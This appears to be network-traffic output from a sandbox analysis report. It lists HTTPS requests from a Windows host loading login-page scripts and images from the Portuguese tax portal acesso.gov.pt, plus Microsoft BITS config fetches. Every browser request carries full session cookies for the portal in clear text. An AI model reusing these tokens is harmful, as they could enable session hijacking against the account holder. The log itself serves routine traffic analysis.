                                                                                                                  25 | 192.168.2.4 | 49763 | 184.28.90.27 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:55 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
                                                                                                                  2024-11-14 13:59:55 UTC | 465 | IN | HTTP/1.1 200 OK
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF67)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                  Cache-Control: public, max-age=9984
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:55 GMT
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  26 | 192.168.2.4 | 49764 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 894 | OUT | GET /autentica_static/img/logo-at.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 372 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=79
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 8698


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  27 | 192.168.2.4 | 49765 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 920 | OUT | GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 8308


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  28 | 192.168.2.4 | 49767 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 1122 | OUT | GET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 58651


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  29 | 192.168.2.4 | 49766 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 1148 | OUT | GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 35961


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  30 | 192.168.2.4 | 49768 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 1133 | OUT | GET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 1609


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  31 | 192.168.2.4 | 49771 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 921 | OUT | GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=14
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 21587


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  32 | 192.168.2.4 | 49769 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 906 | OUT | GET /autentica_static/js/smartresize.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 401 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=18
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 852


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  33 | 192.168.2.4 | 49772 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:56 UTC | 897 | OUT | GET /autentica_static/img/background.png HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:56 UTC | 389 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Upgrade: h2,h2c
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=80
                                                                                                                  Content-Type: image/png
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 0
                                                                                                                  Content-Length: 43457


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49773 | 184.28.90.27 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:56 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  Accept-Encoding: identity
                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Range: bytes=0-2147483646
                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                  Host: fs.microsoft.com
2024-11-14 13:59:56 UTC | 514 | IN | HTTP/1.1 200 OK
                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                  X-CID: 11
                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                  Cache-Control: public, max-age=25937
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Content-Length: 55
                                                                                                                  Connection: close
                                                                                                                  X-CID: 2
                                                                                                                  2024-11-14 13:59:56 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49774 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:56 UTC | 919 | OUT | GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
2024-11-14 13:59:56 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:56 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 95790


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49776 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:57 UTC | 1180 | OUT | GET /autentica_static/icons/favicon.ico HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
2024-11-14 13:59:58 UTC | 375 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=64
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 6518


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49777 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:57 UTC | 909 | OUT | GET /autentica_static/js/capslock-login.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
2024-11-14 13:59:58 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
